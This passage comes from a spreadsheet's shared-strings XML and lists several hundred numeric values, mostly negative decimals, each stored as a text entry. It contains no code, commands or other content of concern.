    <t>-2.11141</t>
  </si>
  <si>
    <t>-6.26118</t>
  </si>
  <si>
    <t>-5.12589</t>
  </si>
  <si>
    <t>-6.25531</t>
  </si>
  <si>
    <t>-6.31464</t>
  </si>
  <si>
    <t>-6.25023</t>
  </si>
  <si>
    <t>-6.30744</t>
  </si>
  <si>
    <t>-6.31370</t>
  </si>
  <si>
    <t>-6.42410</t>
  </si>
  <si>
    <t>-6.33975</t>
  </si>
  <si>
    <t>-6.42063</t>
  </si>
  <si>
    <t>-6.21446</t>
  </si>
  <si>
    <t>-6.21447</t>
  </si>
  <si>
    <t>-6.29106</t>
  </si>
  <si>
    <t>-6.24654</t>
  </si>
  <si>
    <t>-6.35385</t>
  </si>
  <si>
    <t>-6.18678</t>
  </si>
  <si>
    <t>-6.77544</t>
  </si>
  <si>
    <t>-6.41939</t>
  </si>
  <si>
    <t>-6.42096</t>
  </si>
  <si>
    <t>-6.41949</t>
  </si>
  <si>
    <t>-6.42085</t>
  </si>
  <si>
    <t>-5.20705</t>
  </si>
  <si>
    <t>-5.37399</t>
  </si>
  <si>
    <t>-7.32365</t>
  </si>
  <si>
    <t>-7.33722</t>
  </si>
  <si>
    <t>-7.31110</t>
  </si>
  <si>
    <t>-7.32618</t>
  </si>
  <si>
    <t>-7.32535</t>
  </si>
  <si>
    <t>-7.31629</t>
  </si>
  <si>
    <t>-7.36473</t>
  </si>
  <si>
    <t>-7.31495</t>
  </si>
  <si>
    <t>-7.78067</t>
  </si>
  <si>
    <t>-7.33963</t>
  </si>
  <si>
    <t>-7.23395</t>
  </si>
  <si>
    <t>-7.28429</t>
  </si>
  <si>
    <t>-6.20337</t>
  </si>
  <si>
    <t>-8.75481</t>
  </si>
  <si>
    <t>-3.19438</t>
  </si>
  <si>
    <t>-7.80979</t>
  </si>
  <si>
    <t>-8.68542</t>
  </si>
  <si>
    <t>-7.57102</t>
  </si>
  <si>
    <t>-6.13852</t>
  </si>
  <si>
    <t>-6.38712</t>
  </si>
  <si>
    <t>-6.81774</t>
  </si>
  <si>
    <t>-6.10900</t>
  </si>
  <si>
    <t>-6.90760</t>
  </si>
  <si>
    <t>-6.12432</t>
  </si>
  <si>
    <t>-6.13028</t>
  </si>
  <si>
    <t>-6.11185</t>
  </si>
  <si>
    <t>-6.11165</t>
  </si>
  <si>
    <t>-6.10910</t>
  </si>
  <si>
    <t>-6.16726</t>
  </si>
  <si>
    <t>-6.11025</t>
  </si>
  <si>
    <t>-6.83829</t>
  </si>
  <si>
    <t>-6.83968</t>
  </si>
  <si>
    <t>-6.87431</t>
  </si>
  <si>
    <t>-6.22877</t>
  </si>
  <si>
    <t>-6.24431</t>
  </si>
  <si>
    <t>-5.40534</t>
  </si>
  <si>
    <t>-5.36092</t>
  </si>
  <si>
    <t>0.53839</t>
  </si>
  <si>
    <t>0.56815</t>
  </si>
  <si>
    <t>-7.79977</t>
  </si>
  <si>
    <t>-5.54313</t>
  </si>
  <si>
    <t>-5.54282</t>
  </si>
  <si>
    <t>-5.54254</t>
  </si>
  <si>
    <t>-5.54765</t>
  </si>
  <si>
    <t>-6.87672</t>
  </si>
  <si>
    <t>5.11597</t>
  </si>
  <si>
    <t>-6.13166</t>
  </si>
  <si>
    <t>-7.97741</t>
  </si>
  <si>
    <t>-7.77457</t>
  </si>
  <si>
    <t>-7.75839</t>
  </si>
  <si>
    <t>-5.97420</t>
  </si>
  <si>
    <t>-7.83802</t>
  </si>
  <si>
    <t>-6.28793</t>
  </si>
  <si>
    <t>-1.94625</t>
  </si>
  <si>
    <t>-3.46035</t>
  </si>
  <si>
    <t>-6.12359</t>
  </si>
  <si>
    <t>-6.30408</t>
  </si>
  <si>
    <t>-6.24788</t>
  </si>
  <si>
    <t>-6.17336</t>
  </si>
  <si>
    <t>-6.13169</t>
  </si>
  <si>
    <t>-6.72671</t>
  </si>
  <si>
    <t>-6.13628</t>
  </si>
  <si>
    <t>-1.23565</t>
  </si>
  <si>
    <t>-7.69738</t>
  </si>
  <si>
    <t>-6.11734</t>
  </si>
  <si>
    <t>-7.67457</t>
  </si>
  <si>
    <t>-7.67471</t>
  </si>
  <si>
    <t>-7.82802</t>
  </si>
  <si>
    <t>-7.55382</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.88981</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.90828</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.89552</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.96908</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.90668</t>
  </si>
  <si>
    <t>-3.81007</t>
  </si>
  <si>
    <t>-2.55216</t>
  </si>
  <si>
    <t>-2.97028</t>
  </si>
  <si>
    <t>-2.55221</t>
  </si>
  <si>
    <t>-2.59532</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.33156</t>
  </si>
  <si>
    <t>-6.19529</t>
  </si>
  <si>
    <t>-6.20095</t>
  </si>
  <si>
    <t>-6.20090</t>
  </si>
  <si>
    <t>-6.20096</t>
  </si>
  <si>
    <t>-2.55424</t>
  </si>
  <si>
    <t>-2.55410</t>
  </si>
  <si>
    <t>-6.94573</t>
  </si>
  <si>
    <t>-2.55403</t>
  </si>
  <si>
    <t>-2.55224</t>
  </si>
  <si>
    <t>-2.55220</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.86341</t>
  </si>
  <si>
    <t>-6.31493</t>
  </si>
  <si>
    <t>-6.31490</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.86386</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.89091</t>
  </si>
  <si>
    <t>-6.11700</t>
  </si>
  <si>
    <t>-7.78352</t>
  </si>
  <si>
    <t>-6.21824</t>
  </si>
  <si>
    <t>-6.15755</t>
  </si>
  <si>
    <t>-6.15732</t>
  </si>
  <si>
    <t>-2.67524</t>
  </si>
  <si>
    <t>-3.08102</t>
  </si>
  <si>
    <t>-2.49873</t>
  </si>
  <si>
    <t>-1.22695</t>
  </si>
  <si>
    <t>-1.25633</t>
  </si>
  <si>
    <t>3.06717</t>
  </si>
  <si>
    <t>-6.15779</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.93200</t>
  </si>
  <si>
    <t>-6.16479</t>
  </si>
  <si>
    <t>-6.15095</t>
  </si>
  <si>
    <t>-6.20827</t>
  </si>
  <si>
    <t>-6.29097</t>
  </si>
  <si>
    <t>3.57345</t>
  </si>
  <si>
    <t>3.56616</t>
  </si>
  <si>
    <t>-6.13685</t>
  </si>
  <si>
    <t>-6.22103</t>
  </si>
  <si>
    <t>-6.12165</t>
  </si>
  <si>
    <t>-6.11646</t>
  </si>
  <si>
    <t>-6.12732</t>
  </si>
  <si>
    <t>-6.28918</t>
  </si>
  <si>
    <t>-6.28018</t>
  </si>
  <si>
    <t>-7.06512</t>
  </si>
  <si>
    <t>-6.13286</t>
  </si>
  <si>
    <t>-6.16500</t>
  </si>
  <si>
    <t>-6.13290</t>
  </si>
  <si>
    <t>-6.14587</t>
  </si>
  <si>
    <t>-6.12989</t>
  </si>
  <si>
    <t>-6.12991</t>
  </si>
  <si>
    <t>-6.19908</t>
  </si>
  <si>
    <t>-6.13113</t>
  </si>
  <si>
    <t>-6.92551</t>
  </si>
  <si>
    <t>-6.15056</t>
  </si>
  <si>
    <t>-1.26418</t>
  </si>
  <si>
    <t>-6.92943</t>
  </si>
  <si>
    <t>-.32938</t>
  </si>
  <si>
    <t>-6.30510</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.04111</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.04110</t>
  </si>
  <si>
    <t>-6.36036</t>
  </si>
  <si>
    <t>-6.25065</t>
  </si>
  <si>
    <t>-6.31084</t>
  </si>
  <si>
    <t>-6.33026</t>
  </si>
  <si>
    <t>-6.27296</t>
  </si>
  <si>
    <t>-6.27299</t>
  </si>
  <si>
    <t>-3.80904</t>
  </si>
  <si>
    <t>-6.79318</t>
  </si>
  <si>
    <t>-6.53736</t>
  </si>
  <si>
    <t>-6.19202</t>
  </si>
  <si>
    <t>-6.18239</t>
  </si>
  <si>
    <t>-6.17371</t>
  </si>
  <si>
    <t>-6.16395</t>
  </si>
  <si>
    <t>-6.17421</t>
  </si>
  <si>
    <t>-6.25463</t>
  </si>
  <si>
    <t>-6.21819</t>
  </si>
  <si>
    <t>-6.16606</t>
  </si>
  <si>
    <t>-6.22461</t>
  </si>
  <si>
    <t>-6.19190</t>
  </si>
  <si>
    <t>-6.18191</t>
  </si>
  <si>
    <t>-6.21695</t>
  </si>
  <si>
    <t>-6.15087</t>
  </si>
  <si>
    <t>-6.18349</t>
  </si>
  <si>
    <t>-6.16561</t>
  </si>
  <si>
    <t>-6.16653</t>
  </si>
  <si>
    <t>-6.16607</t>
  </si>
  <si>
    <t>-6.17078</t>
  </si>
  <si>
    <t>-6.17389</t>
  </si>
  <si>
    <t>-6.17405</t>
  </si>
  <si>
    <t>-6.18677</t>
  </si>
  <si>
    <t>-6.17339</t>
  </si>
  <si>
    <t>-6.23475</t>
  </si>
  <si>
    <t>-6.13903</t>
  </si>
  <si>
    <t>-6.84044</t>
  </si>
  <si>
    <t>-6.15156</t>
  </si>
  <si>
    <t>-6.18034</t>
  </si>
  <si>
    <t>-6.17239</t>
  </si>
  <si>
    <t>-6.16644</t>
  </si>
  <si>
    <t>-6.17170</t>
  </si>
  <si>
    <t>1.67316</t>
  </si>
  <si>
    <t>-6.17167</t>
  </si>
  <si>
    <t>-6.20358</t>
  </si>
  <si>
    <t>-6.16971</t>
  </si>
  <si>
    <t>-6.12153</t>
  </si>
  <si>
    <t>-6.12141</t>
  </si>
  <si>
    <t>-6.12152</t>
  </si>
  <si>
    <t>-6.13271</t>
  </si>
  <si>
    <t>-6.13206</t>
  </si>
  <si>
    <t>-1.35014</t>
  </si>
  <si>
    <t>-6.19787</t>
  </si>
  <si>
    <t>1.66656</t>
  </si>
  <si>
    <t>-6.16621</t>
  </si>
  <si>
    <t>-6.61666</t>
  </si>
  <si>
    <t>-6.27597</t>
  </si>
  <si>
    <t>-7.84508</t>
  </si>
  <si>
    <t>-3.69914</t>
  </si>
  <si>
    <t>-6.23805</t>
  </si>
  <si>
    <t>-6.23792</t>
  </si>
  <si>
    <t>-6.22744</t>
  </si>
  <si>
    <t>-6.22747</t>
  </si>
  <si>
    <t>-6.24557</t>
  </si>
  <si>
    <t>-6.27547</t>
  </si>
  <si>
    <t>-6.27544</t>
  </si>
  <si>
    <t>-6.27546</t>
  </si>
  <si>
    <t>-6.21232</t>
  </si>
  <si>
    <t>-6.39596</t>
  </si>
  <si>
    <t>-6.38975</t>
  </si>
  <si>
    <t>-6.27536</t>
  </si>
  <si>
    <t>-6.23886</t>
  </si>
  <si>
    <t>-6.27162</t>
  </si>
  <si>
    <t>-6.23459</t>
  </si>
  <si>
    <t>-6.16654</t>
  </si>
  <si>
    <t>-6.27985</t>
  </si>
  <si>
    <t>-6.27989</t>
  </si>
  <si>
    <t>-6.33521</t>
  </si>
  <si>
    <t>-6.23051</t>
  </si>
  <si>
    <t>-2.55159</t>
  </si>
  <si>
    <t>-7.76140</t>
  </si>
  <si>
    <t>-6.35678</t>
  </si>
  <si>
    <t>-6.31733</t>
  </si>
  <si>
    <t>-6.33540</t>
  </si>
  <si>
    <t>-6.33638</t>
  </si>
  <si>
    <t>-6.33629</t>
  </si>
  <si>
    <t>-6.33636</t>
  </si>
  <si>
    <t>-6.22818</t>
  </si>
  <si>
    <t>-6.30502</t>
  </si>
  <si>
    <t>-6.32244</t>
  </si>
  <si>
    <t>-6.24024</t>
  </si>
  <si>
    <t>-6.31338</t>
  </si>
  <si>
    <t>-6.29137</t>
  </si>
  <si>
    <t>-6.31124</t>
  </si>
  <si>
    <t>-6.33628</t>
  </si>
  <si>
    <t>-6.15997</t>
  </si>
  <si>
    <t>-6.31727</t>
  </si>
  <si>
    <t>-6.16605</t>
  </si>
  <si>
    <t>-7.84509</t>
  </si>
  <si>
    <t>-6.29449</t>
  </si>
  <si>
    <t>-6.24429</t>
  </si>
  <si>
    <t>-6.33504</t>
  </si>
  <si>
    <t>-6.17436</t>
  </si>
  <si>
    <t>-6.26295</t>
  </si>
  <si>
    <t>-6.35603</t>
  </si>
  <si>
    <t>-7.63232</t>
  </si>
  <si>
    <t>-6.18181</t>
  </si>
  <si>
    <t>-6.23738</t>
  </si>
  <si>
    <t>-6.13373</t>
  </si>
  <si>
    <t>-6.17402</t>
  </si>
  <si>
    <t>-6.17833</t>
  </si>
  <si>
    <t>-6.23871</t>
  </si>
  <si>
    <t>-6.16604</t>
  </si>
  <si>
    <t>-6.16641</t>
  </si>
  <si>
    <t>-6.17034</t>
  </si>
  <si>
    <t>-6.16534</t>
  </si>
  <si>
    <t>-2.55087</t>
  </si>
  <si>
    <t>1.50324</t>
  </si>
  <si>
    <t>1.68520</t>
  </si>
  <si>
    <t>-6.22881</t>
  </si>
  <si>
    <t>-6.22834</t>
  </si>
  <si>
    <t>-7.23074</t>
  </si>
  <si>
    <t>-6.10386</t>
  </si>
  <si>
    <t>-5.42890</t>
  </si>
  <si>
    <t>-6.93421</t>
  </si>
  <si>
    <t>-6.94321</t>
  </si>
  <si>
    <t>-6.32012</t>
  </si>
  <si>
    <t>-6.31518</t>
  </si>
  <si>
    <t>-6.30527</t>
  </si>
  <si>
    <t>-6.28380</t>
  </si>
  <si>
    <t>-6.17555</t>
  </si>
  <si>
    <t>-6.30216</t>
  </si>
  <si>
    <t>-6.86194</t>
  </si>
  <si>
    <t>-6.30210</t>
  </si>
  <si>
    <t>-6.25403</t>
  </si>
  <si>
    <t>-6.30269</t>
  </si>
  <si>
    <t>-6.30290</t>
  </si>
  <si>
    <t>-7.60743</t>
  </si>
  <si>
    <t>-6.56246</t>
  </si>
  <si>
    <t>-7.49247</t>
  </si>
  <si>
    <t>-.87643</t>
  </si>
  <si>
    <t>-6.94328</t>
  </si>
  <si>
    <t>-6.26944</t>
  </si>
  <si>
    <t>-7.60011</t>
  </si>
  <si>
    <t>-7.01098</t>
  </si>
  <si>
    <t>-7.55530</t>
  </si>
  <si>
    <t>-6.24796</t>
  </si>
  <si>
    <t>-7.55041</t>
  </si>
  <si>
    <t>-7.39487</t>
  </si>
  <si>
    <t>-6.18530</t>
  </si>
  <si>
    <t>-6.49229</t>
  </si>
  <si>
    <t>-6.27416</t>
  </si>
  <si>
    <t>-6.26145</t>
  </si>
  <si>
    <t>-6.27160</t>
  </si>
  <si>
    <t>-6.27537</t>
  </si>
  <si>
    <t>-6.24383</t>
  </si>
  <si>
    <t>-6.94119</t>
  </si>
  <si>
    <t>-2.55253</t>
  </si>
  <si>
    <t>1.68412</t>
  </si>
  <si>
    <t>3.48407</t>
  </si>
  <si>
    <t>-6.10994</t>
  </si>
  <si>
    <t>-7.64176</t>
  </si>
  <si>
    <t>-6.14526</t>
  </si>
  <si>
    <t>-6.10458</t>
  </si>
  <si>
    <t>-6.10461</t>
  </si>
  <si>
    <t>-6.14277</t>
  </si>
  <si>
    <t>-7.81192</t>
  </si>
  <si>
    <t>-8.21090</t>
  </si>
  <si>
    <t>-6.10459</t>
  </si>
  <si>
    <t>-7.34590</t>
  </si>
  <si>
    <t>-6.14146</t>
  </si>
  <si>
    <t>-7.48329</t>
  </si>
  <si>
    <t>-8.22498</t>
  </si>
  <si>
    <t>-6.11929</t>
  </si>
  <si>
    <t>-6.25195</t>
  </si>
  <si>
    <t>-6.24737</t>
  </si>
  <si>
    <t>-6.13553</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.44898</t>
  </si>
  <si>
    <t>-6.95870</t>
  </si>
  <si>
    <t>-6.02074</t>
  </si>
  <si>
    <t>-6.01165</t>
  </si>
  <si>
    <t>-6.01160</t>
  </si>
  <si>
    <t>-6.03722</t>
  </si>
  <si>
    <t>-6.87185</t>
  </si>
  <si>
    <t>-6.17554</t>
  </si>
  <si>
    <t>3.54140</t>
  </si>
  <si>
    <t>3.57853</t>
  </si>
  <si>
    <t>3.57475</t>
  </si>
  <si>
    <t>-6.17817</t>
  </si>
  <si>
    <t>3.59853</t>
  </si>
  <si>
    <t>-7.29643</t>
  </si>
  <si>
    <t>-6.10392</t>
  </si>
  <si>
    <t>-6.10613</t>
  </si>
  <si>
    <t>-6.13304</t>
  </si>
  <si>
    <t>-6.96195</t>
  </si>
  <si>
    <t>-6.96891</t>
  </si>
  <si>
    <t>-6.32879</t>
  </si>
  <si>
    <t>5.20418</t>
  </si>
  <si>
    <t>5.04130</t>
  </si>
  <si>
    <t>-3.59200</t>
  </si>
  <si>
    <t>-6.24368</t>
  </si>
  <si>
    <t>-6.99007</t>
  </si>
  <si>
    <t>4.94919</t>
  </si>
  <si>
    <t>5.09654</t>
  </si>
  <si>
    <t>-6.42891</t>
  </si>
  <si>
    <t>-6.80182</t>
  </si>
  <si>
    <t>-6.22916</t>
  </si>
  <si>
    <t>-7.11774</t>
  </si>
  <si>
    <t>-7.19271</t>
  </si>
  <si>
    <t>-6.90861</t>
  </si>
  <si>
    <t>-7.30049</t>
  </si>
  <si>
    <t>-7.30055</t>
  </si>
  <si>
    <t>-7.25943</t>
  </si>
  <si>
    <t>-7.89177</t>
  </si>
  <si>
    <t>-7.24734</t>
  </si>
  <si>
    <t>-7.25846</t>
  </si>
  <si>
    <t>-7.56508</t>
  </si>
  <si>
    <t>5.18265</t>
  </si>
  <si>
    <t>-6.13857</t>
  </si>
  <si>
    <t>-6.13917</t>
  </si>
  <si>
    <t>5.18161</t>
  </si>
  <si>
    <t>-7.15476</t>
  </si>
  <si>
    <t>-5.14128</t>
  </si>
  <si>
    <t>-5.13059</t>
  </si>
  <si>
    <t>-5.16853</t>
  </si>
  <si>
    <t>-6.14883</t>
  </si>
  <si>
    <t>-5.14701</t>
  </si>
  <si>
    <t>-6.69025</t>
  </si>
  <si>
    <t>-6.89113</t>
  </si>
  <si>
    <t>-6.89288</t>
  </si>
  <si>
    <t>-6.94175</t>
  </si>
  <si>
    <t>-6.13196</t>
  </si>
  <si>
    <t>-7.25631</t>
  </si>
  <si>
    <t>-7.25734</t>
  </si>
  <si>
    <t>-7.20845</t>
  </si>
  <si>
    <t>-7.26797</t>
  </si>
  <si>
    <t>-7.25304</t>
  </si>
  <si>
    <t>-6.63024</t>
  </si>
  <si>
    <t>-7.35266</t>
  </si>
  <si>
    <t>-1.67355</t>
  </si>
  <si>
    <t>-7.24237</t>
  </si>
  <si>
    <t>-6.99794</t>
  </si>
  <si>
    <t>-7.20284</t>
  </si>
  <si>
    <t>-6.21218</t>
  </si>
  <si>
    <t>-6.21212</t>
  </si>
  <si>
    <t>-7.80512</t>
  </si>
  <si>
    <t>-7.36217</t>
  </si>
  <si>
    <t>-7.46943</t>
  </si>
  <si>
    <t>-7.39211</t>
  </si>
  <si>
    <t>-7.36074</t>
  </si>
  <si>
    <t>-7.35381</t>
  </si>
  <si>
    <t>-7.76493</t>
  </si>
  <si>
    <t>-7.79114</t>
  </si>
  <si>
    <t>-6.97572</t>
  </si>
  <si>
    <t>-6.14303</t>
  </si>
  <si>
    <t>-7.02997</t>
  </si>
  <si>
    <t>-7.15471</t>
  </si>
  <si>
    <t>-7.04780</t>
  </si>
  <si>
    <t>-7.16055</t>
  </si>
  <si>
    <t>-3.61698</t>
  </si>
  <si>
    <t>-7.47276</t>
  </si>
  <si>
    <t>-7.47041</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.79507</t>
  </si>
  <si>
    <t>-6.97005</t>
  </si>
  <si>
    <t>-8.03542</t>
  </si>
  <si>
    <t>-3.31680</t>
  </si>
  <si>
    <t>-6.17569</t>
  </si>
  <si>
    <t>-3.42374</t>
  </si>
  <si>
    <t>-7.03858</t>
  </si>
  <si>
    <t>-3.40774</t>
  </si>
  <si>
    <t>-6.17757</t>
  </si>
  <si>
    <t>-3.44211</t>
  </si>
  <si>
    <t>-3.30765</t>
  </si>
  <si>
    <t>-3.30930</t>
  </si>
  <si>
    <t>-3.36774</t>
  </si>
  <si>
    <t>-3.33311</t>
  </si>
  <si>
    <t>-3.29621</t>
  </si>
  <si>
    <t>-3.35705</t>
  </si>
  <si>
    <t>-3.32045</t>
  </si>
  <si>
    <t>-3.33796</t>
  </si>
  <si>
    <t>-2.59160</t>
  </si>
  <si>
    <t>-2.58509</t>
  </si>
  <si>
    <t>-3.31891</t>
  </si>
  <si>
    <t>-6.32485</t>
  </si>
  <si>
    <t>-2.92857</t>
  </si>
  <si>
    <t>-2.92855</t>
  </si>
  <si>
    <t>-3.26128</t>
  </si>
  <si>
    <t>-3.35413</t>
  </si>
  <si>
    <t>-3.36450</t>
  </si>
  <si>
    <t>-8.38937</t>
  </si>
  <si>
    <t>-3.27163</t>
  </si>
  <si>
    <t>-3.78175</t>
  </si>
  <si>
    <t>-3.40380</t>
  </si>
  <si>
    <t>-3.39207</t>
  </si>
  <si>
    <t>-2.81314</t>
  </si>
  <si>
    <t xml:space="preserve"> -0.47481</t>
  </si>
  <si>
    <t>-3.31530</t>
  </si>
  <si>
    <t>-2.08574</t>
  </si>
  <si>
    <t>-3.29541</t>
  </si>
  <si>
    <t>-2.78677</t>
  </si>
  <si>
    <t>-3.34076</t>
  </si>
  <si>
    <t>-3.41011</t>
  </si>
  <si>
    <t>-3.33234</t>
  </si>
  <si>
    <t>-3.30774</t>
  </si>
  <si>
    <t>-3.26683</t>
  </si>
  <si>
    <t>-3.41664</t>
  </si>
  <si>
    <t>-3.32192</t>
  </si>
  <si>
    <t>-3.25019</t>
  </si>
  <si>
    <t>-2.28158</t>
  </si>
  <si>
    <t>-3.56943</t>
  </si>
  <si>
    <t>-3.32979</t>
  </si>
  <si>
    <t>-3.41646</t>
  </si>
  <si>
    <t>-2.58412</t>
  </si>
  <si>
    <t>-3.26342</t>
  </si>
  <si>
    <t>-3.31524</t>
  </si>
  <si>
    <t>-2.56666</t>
  </si>
  <si>
    <t>-3.35113</t>
  </si>
  <si>
    <t>-3.32373</t>
  </si>
  <si>
    <t>-2.03998</t>
  </si>
  <si>
    <t>-3.33378</t>
  </si>
  <si>
    <t>-3.32135</t>
  </si>
  <si>
    <t>-3.32693</t>
  </si>
  <si>
    <t>-3.34811</t>
  </si>
  <si>
    <t>-3.40378</t>
  </si>
  <si>
    <t>-3.37994</t>
  </si>
  <si>
    <t>-3.31045</t>
  </si>
  <si>
    <t>-3.28476</t>
  </si>
  <si>
    <t>-3.32812</t>
  </si>
  <si>
    <t>-3.80221</t>
  </si>
  <si>
    <t>-2.59207</t>
  </si>
  <si>
    <t>-3.26121</t>
  </si>
  <si>
    <t>-3.31593</t>
  </si>
  <si>
    <t>-3.34285</t>
  </si>
  <si>
    <t>-3.42192</t>
  </si>
  <si>
    <t>-3.34271</t>
  </si>
  <si>
    <t>-2.92629</t>
  </si>
  <si>
    <t>-3.48237</t>
  </si>
  <si>
    <t>-2.28200</t>
  </si>
  <si>
    <t>-3.29910</t>
  </si>
  <si>
    <t>-1.56177</t>
  </si>
  <si>
    <t>-2.58770</t>
  </si>
  <si>
    <t>-3.31837</t>
  </si>
  <si>
    <t>-2.58572</t>
  </si>
  <si>
    <t>-2.58796</t>
  </si>
  <si>
    <t>-3.45486</t>
  </si>
  <si>
    <t>-3.33997</t>
  </si>
  <si>
    <t>-3.31598</t>
  </si>
  <si>
    <t>-3.49986</t>
  </si>
  <si>
    <t>-3.40651</t>
  </si>
  <si>
    <t>-3.40389</t>
  </si>
  <si>
    <t>-3.35303</t>
  </si>
  <si>
    <t>-3.35680</t>
  </si>
  <si>
    <t>-3.50069</t>
  </si>
  <si>
    <t>-2.44172</t>
  </si>
  <si>
    <t>-3.40543</t>
  </si>
  <si>
    <t>-2.29936</t>
  </si>
  <si>
    <t>-2.58703</t>
  </si>
  <si>
    <t>-3.24966</t>
  </si>
  <si>
    <t>-3.36396</t>
  </si>
  <si>
    <t>-3.41427</t>
  </si>
  <si>
    <t>-3.29321</t>
  </si>
  <si>
    <t>-3.41196</t>
  </si>
  <si>
    <t>-2.58623</t>
  </si>
  <si>
    <t>-8.70395</t>
  </si>
  <si>
    <t>-3.32081</t>
  </si>
  <si>
    <t>-3.29095</t>
  </si>
  <si>
    <t>-3.33698</t>
  </si>
  <si>
    <t>-3.40547</t>
  </si>
  <si>
    <t>-2.64174</t>
  </si>
  <si>
    <t>-3.40551</t>
  </si>
  <si>
    <t>-2.58571</t>
  </si>
  <si>
    <t>-2.33253</t>
  </si>
  <si>
    <t>-3.31678</t>
  </si>
  <si>
    <t>-3.38090</t>
  </si>
  <si>
    <t>-6.92619</t>
  </si>
  <si>
    <t>-7.67007</t>
  </si>
  <si>
    <t>1.48844</t>
  </si>
  <si>
    <t>-3.25337</t>
  </si>
  <si>
    <t>-3.31443</t>
  </si>
  <si>
    <t>-2.58553</t>
  </si>
  <si>
    <t>-6.92606</t>
  </si>
  <si>
    <t>-3.40950</t>
  </si>
  <si>
    <t>-3.35740</t>
  </si>
  <si>
    <t>-3.35535</t>
  </si>
  <si>
    <t>-3.27060</t>
  </si>
  <si>
    <t>-3.27159</t>
  </si>
  <si>
    <t>-2.58964</t>
  </si>
  <si>
    <t>-7.04956</t>
  </si>
  <si>
    <t>-3.37198</t>
  </si>
  <si>
    <t>1.15589</t>
  </si>
  <si>
    <t>-3.33416</t>
  </si>
  <si>
    <t>-6.16763</t>
  </si>
  <si>
    <t>-3.12919</t>
  </si>
  <si>
    <t>-7.95312</t>
  </si>
  <si>
    <t>-6.87600</t>
  </si>
  <si>
    <t>-7.81394</t>
  </si>
  <si>
    <t>-7.81823</t>
  </si>
  <si>
    <t>-6.18797</t>
  </si>
  <si>
    <t>-2.92932</t>
  </si>
  <si>
    <t>-7.98145</t>
  </si>
  <si>
    <t>-7.82344</t>
  </si>
  <si>
    <t>-3.27724</t>
  </si>
  <si>
    <t>-6.17955</t>
  </si>
  <si>
    <t>-3.15678</t>
  </si>
  <si>
    <t>-7.96605</t>
  </si>
  <si>
    <t>-7.02634</t>
  </si>
  <si>
    <t>-3.31366</t>
  </si>
  <si>
    <t>-3.34107</t>
  </si>
  <si>
    <t>1.41439</t>
  </si>
  <si>
    <t>1.41460</t>
  </si>
  <si>
    <t>-3.92845</t>
  </si>
  <si>
    <t>-6.13182</t>
  </si>
  <si>
    <t>-3.75703</t>
  </si>
  <si>
    <t>-7.35294</t>
  </si>
  <si>
    <t>-7.35272</t>
  </si>
  <si>
    <t>-7.35251</t>
  </si>
  <si>
    <t>-3.28914</t>
  </si>
  <si>
    <t>-7.82257</t>
  </si>
  <si>
    <t>-6.75987</t>
  </si>
  <si>
    <t>-6.94236</t>
  </si>
  <si>
    <t>-3.92848</t>
  </si>
  <si>
    <t>-6.70291</t>
  </si>
  <si>
    <t>1.46776</t>
  </si>
  <si>
    <t>1.46304</t>
  </si>
  <si>
    <t>-6.19391</t>
  </si>
  <si>
    <t>-6.19390</t>
  </si>
  <si>
    <t>-2.67946</t>
  </si>
  <si>
    <t>-7.77803</t>
  </si>
  <si>
    <t>-6.88389</t>
  </si>
  <si>
    <t>-6.19389</t>
  </si>
  <si>
    <t>-5.11843</t>
  </si>
  <si>
    <t>-6.26129</t>
  </si>
  <si>
    <t>-6.24941</t>
  </si>
  <si>
    <t>-6.23491</t>
  </si>
  <si>
    <t>-6.96205</t>
  </si>
  <si>
    <t>-6.22817</t>
  </si>
  <si>
    <t>-6.29178</t>
  </si>
  <si>
    <t>-7.58460</t>
  </si>
  <si>
    <t>-7.56760</t>
  </si>
  <si>
    <t>-6.15601</t>
  </si>
  <si>
    <t>-7.58875</t>
  </si>
  <si>
    <t>-6.91851</t>
  </si>
  <si>
    <t>-6.21270</t>
  </si>
  <si>
    <t>-7.07234</t>
  </si>
  <si>
    <t>-6.23464</t>
  </si>
  <si>
    <t>-8.17747</t>
  </si>
  <si>
    <t>-7.82391</t>
  </si>
  <si>
    <t>-6.25296</t>
  </si>
  <si>
    <t>-6.17399</t>
  </si>
  <si>
    <t>-7.89774</t>
  </si>
  <si>
    <t>-8.06265</t>
  </si>
  <si>
    <t>-6.12521</t>
  </si>
  <si>
    <t>-6.12515</t>
  </si>
  <si>
    <t>-6.12517</t>
  </si>
  <si>
    <t>-6.17499</t>
  </si>
  <si>
    <t>-7.09088</t>
  </si>
  <si>
    <t>-7.64507</t>
  </si>
  <si>
    <t>-6.16160</t>
  </si>
  <si>
    <t>-6.60490</t>
  </si>
  <si>
    <t>-2.92895</t>
  </si>
  <si>
    <t>-7.82512</t>
  </si>
  <si>
    <t>2.19235</t>
  </si>
  <si>
    <t>-6.60487</t>
  </si>
  <si>
    <t>-6.60493</t>
  </si>
  <si>
    <t>-7.82297</t>
  </si>
  <si>
    <t>-6.60489</t>
  </si>
  <si>
    <t>-6.60492</t>
  </si>
  <si>
    <t>-6.24096</t>
  </si>
  <si>
    <t>-7.67629</t>
  </si>
  <si>
    <t>-6.20767</t>
  </si>
  <si>
    <t>-6.20926</t>
  </si>
  <si>
    <t>-6.22905</t>
  </si>
  <si>
    <t>-6.11254</t>
  </si>
  <si>
    <t>-6.14070</t>
  </si>
  <si>
    <t>-6.15885</t>
  </si>
  <si>
    <t>-6.11951</t>
  </si>
  <si>
    <t>-6.14840</t>
  </si>
  <si>
    <t>-6.18463</t>
  </si>
  <si>
    <t>-6.27097</t>
  </si>
  <si>
    <t>-8.80346</t>
  </si>
  <si>
    <t>-7.61739</t>
  </si>
  <si>
    <t>-6.12089</t>
  </si>
  <si>
    <t>-6.80378</t>
  </si>
  <si>
    <t>-8.12755</t>
  </si>
  <si>
    <t>-6.95707</t>
  </si>
  <si>
    <t>-6.24874</t>
  </si>
  <si>
    <t>-6.24066</t>
  </si>
  <si>
    <t>-6.26967</t>
  </si>
  <si>
    <t>-6.96679</t>
